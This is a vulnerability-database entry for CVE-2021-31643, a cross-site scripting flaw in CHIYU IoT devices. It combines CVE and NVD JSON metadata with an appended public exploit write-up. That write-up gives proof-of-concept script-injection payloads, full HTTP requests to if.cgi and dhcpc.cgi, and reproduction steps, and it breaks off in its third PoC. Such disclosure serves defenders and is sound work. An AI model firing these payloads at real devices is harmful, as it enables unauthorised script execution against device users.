CVE-2021-31643 (GCVE-0-2021-31643)
Vulnerability from cvelistv5 – Published: 2021-06-01 14:16 – Updated: 2024-08-03 23:03
VLAI?
Summary
An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T23:03:33.649Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-06-01T16:06:15",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-31643",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/",
"refsource": "MISC",
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/"
},
{
"name": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html",
"refsource": "MISC",
"url": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html"
},
{
"name": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643",
"refsource": "MISC",
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643"
},
{
"name": "http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-31643",
"datePublished": "2021-06-01T14:16:12",
"dateReserved": "2021-04-23T00:00:00",
"dateUpdated": "2024-08-03T23:03:33.649Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"fkie_nvd": {
"configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:chiyu-tech:bf-631_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"D6C27421-EA1F-46FB-AFA7-7A1E75AC471C\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:chiyu-tech:bf-631:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"F5451C0F-FA08-467D-86AC-034A2AAA8468\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:chiyu-tech:bf-630_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"B3CD54F1-95A0-4014-8466-E29B5F819B7E\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:chiyu-tech:bf-630:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"49BA7B09-A81C-4B8C-A50C-9F58B53903A2\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:chiyu-tech:semac_s2_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"E605EBAB-D5F9-43A8-8096-DA62A4295A92\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:chiyu-tech:semac_s2:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"BDAC8B2A-8AB4-4EAB-84D5-526F89C8D9B6\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:chiyu-tech:semac_d1_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"A4B14981-FCEA-45FC-896F-7677BEB7A8FB\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:chiyu-tech:semac_d1:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"59C613EE-4884-4CD6-B4BA-AF41FD26DB35\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:chiyu-tech:semac_d2_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"10BBB47A-E6EF-4EE5-A74C-F7766004880B\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:chiyu-tech:semac_d2:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"7123F403-1044-4ECC-A6F8-AB8E0173432B\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:chiyu-tech:semac_d4_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"D6A0946C-6A4F-4A9E-9D7C-702A74236C89\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:chiyu-tech:semac_d4:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"0F4E3539-D33A-48E1-8B09-4D010BEAC9C1\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:chiyu-tech:semac_s3v3_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"DF097E2D-8F46-4EE0-9C0E-449EDC5FE373\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:chiyu-tech:semac_s3v3:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"231A210D-7A72-4E54-BF7D-2594F2735D68\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:chiyu-tech:semac_d2_n300_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"52481D14-6CDD-4D28-ACEB-83EC3FAC7F4D\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:chiyu-tech:semac_d2_n300:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"24D35D62-9633-410F-9D2D-FD61CD5A820B\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:chiyu-tech:semac_s1_osdp_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"B982FDE3-0F08-46F8-8A50-BB5650AA5076\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:chiyu-tech:semac_s1_osdp:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"965D6B8E-A7E7-40B3-A4C3-4942E61491A5\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:chiyu-tech:webpass_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"5D66FE82-1351-4532-811F-ED7C98B0FFA3\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:chiyu-tech:webpass:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"3EE455A8-8F52-4F08-9ED6-D4A081CFC185\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:chiyu-tech:biosense_firmware:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"9CDE9F3B-3952-4715-B8B0-F1A971B06254\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:chiyu-tech:biosense:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"7C3D40CA-A163-4B11-A070-04FB492194E1\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter.\"}, {\"lang\": \"es\", \"value\": \"Se presenta una vulnerabilidad de tipo XSS en varios dispositivos IoT de CHIYU Technology, incluyendo SEMAC, Biosense, BF-630, BF-631 y Webpass, debido a una falta de sanitizaci\\u00f3n en el component if.cgi - par\\u00e1metro username\"}]",
"id": "CVE-2021-31643",
"lastModified": "2024-11-21T06:06:04.037",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\", \"baseScore\": 5.4, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.3, \"impactScore\": 2.7}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:M/Au:S/C:N/I:P/A:N\", \"baseScore\": 3.5, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"MEDIUM\", \"authentication\": \"SINGLE\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"NONE\"}, \"baseSeverity\": \"LOW\", \"exploitabilityScore\": 6.8, \"impactScore\": 2.9, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": true}]}",
"published": "2021-06-01T15:15:07.747",
"references": "[{\"url\": \"http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://www.chiyu-tech.com/msg/message-Firmware-update-87.html\", \"source\": \"cve@mitre.org\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://www.chiyu-tech.com/msg/message-Firmware-update-87.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}]",
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-79\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2021-31643\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2021-06-01T15:15:07.747\",\"lastModified\":\"2024-11-21T06:06:04.037\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter.\"},{\"lang\":\"es\",\"value\":\"Se presenta una vulnerabilidad de tipo XSS en varios dispositivos IoT de CHIYU Technology, incluyendo SEMAC, Biosense, BF-630, BF-631 y Webpass, debido a una falta de sanitizaci\u00f3n en el component if.cgi - par\u00e1metro username\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":2.7}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:S/C:N/I:P/A:N\",\"baseScore\":3.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"SINGLE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"LOW\",\"exploitabilityScore\":6.8,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:chiyu-tech:bf-631_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D6C27421-EA1F-46FB-AFA7-7A1E75AC471C\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:chiyu-tech:bf-631:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F5451C0F-FA08-467D-86AC-034A2AAA8468\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:chiyu-tech:bf-630_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B3CD54F1-95A0-4014-8466-E29B5F819B7E\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:chiyu-tech:bf-630:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"49BA7B09-A81C-4B8C-A50C-9F58B53903A2\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:chiyu-tech:semac_s2_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E605EBAB-D5F9-43A8-8096-DA62A4295A92\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:chiyu-tech:semac_s2:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BDAC8B2A-8AB4-4EAB-84D5-526F89C8D9B6\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:chiyu-tech:semac_d1_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"A4B14981-FCEA-45FC-896F-7677BEB7A8FB\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:chiyu-tech:semac_d1:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"59C613EE-4884-4CD6-B4BA-AF41FD26DB35\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:chiyu-tech:semac_d2_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"10BBB47A-E6EF-4EE5-A74C-F7766004880B\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:chiyu-tech:semac_d2:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7123F403-1044-4ECC-A6F8-AB8E0173432B\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:chiyu-tech:semac_d4_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D6A0946C-6A4F-4A9E-9D7C-702A74236C89\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:chiyu-tech:semac_d4:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0F4E3539-D33A-48E1-8B09-4D010BEAC9C1\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:chiyu-tech:semac_s3v3_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"DF097E2D-8F46-4EE0-9C0E-449EDC5FE373\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:chiyu-tech:semac_s3v3:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"231A210D-7A72-4E54-BF7D-2594F2735D68\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:chiyu-tech:semac_d2_n300_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"52481D14-6CDD-4D28-ACEB-83EC3FAC7F4D\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:chiyu-tech:semac_d2_n300:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"24D35D62-9633-410F-9D2D-FD61CD5A820B\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:chiyu-tech:semac_s1_osdp_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"B982FDE3-0F08-46F8-8A50-BB5650AA5076\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:chiyu-tech:semac_s1_osdp:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"965D6B8E-A7E7-40B3-A4C3-4942E61491A5\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:chiyu-tech:webpass_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5D66FE82-1351-4532-811F-ED7C98B0FFA3\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:chiyu-tech:webpass:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3EE455A8-8F52-4F08-9ED6-D4A081CFC185\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:chiyu-tech:biosense_firmware:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"9CDE9F3B-3952-4715-B8B0-F1A971B06254\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:chiyu-tech:biosense:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7C3D40CA-A163-4B11-A070-04FB492194E1\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.chiyu-tech.com/msg/message-Firmware-update-87.html\",\"source\":\"cve@mitre.org\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.chiyu-tech.com/msg/message-Firmware-update-87.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]}]}}"
}
}
VAR-202106-1313
Vulnerability from variot - Updated: 2023-12-18 12:26An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter. An attacker can use this vulnerability to execute client code. # Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
Date: May 31 2021
Exploit Author: sirpedrotavares
Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
Software Link: https://www.chiyu-tech.com/category-hardware.html
Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021
Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC
CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643
Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
CVE ID: CVE-2021-31250 CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
============= PoC 01 =============== Affected parameter: TF_submask Component: if.cgi Payload: ">alert(123)
HTTP Request: GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/ap_tcps.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1
Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (if.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_submask) 4. Submit the request and observe payload execution
============= PoC 02 ===============
Affected parameter: TF_hostname=Component: dhcpc.cgi
Payload: /">
HTTP request and response:
HTTP Request: GET /dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/wan_dc.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1
Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (dhcpc.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_hostname) 4. Submit the request and observe payload execution
============= PoC 03 =============== Affected parameter: TF_servicename=Component: ppp.cgi Payload: ">alert(123)
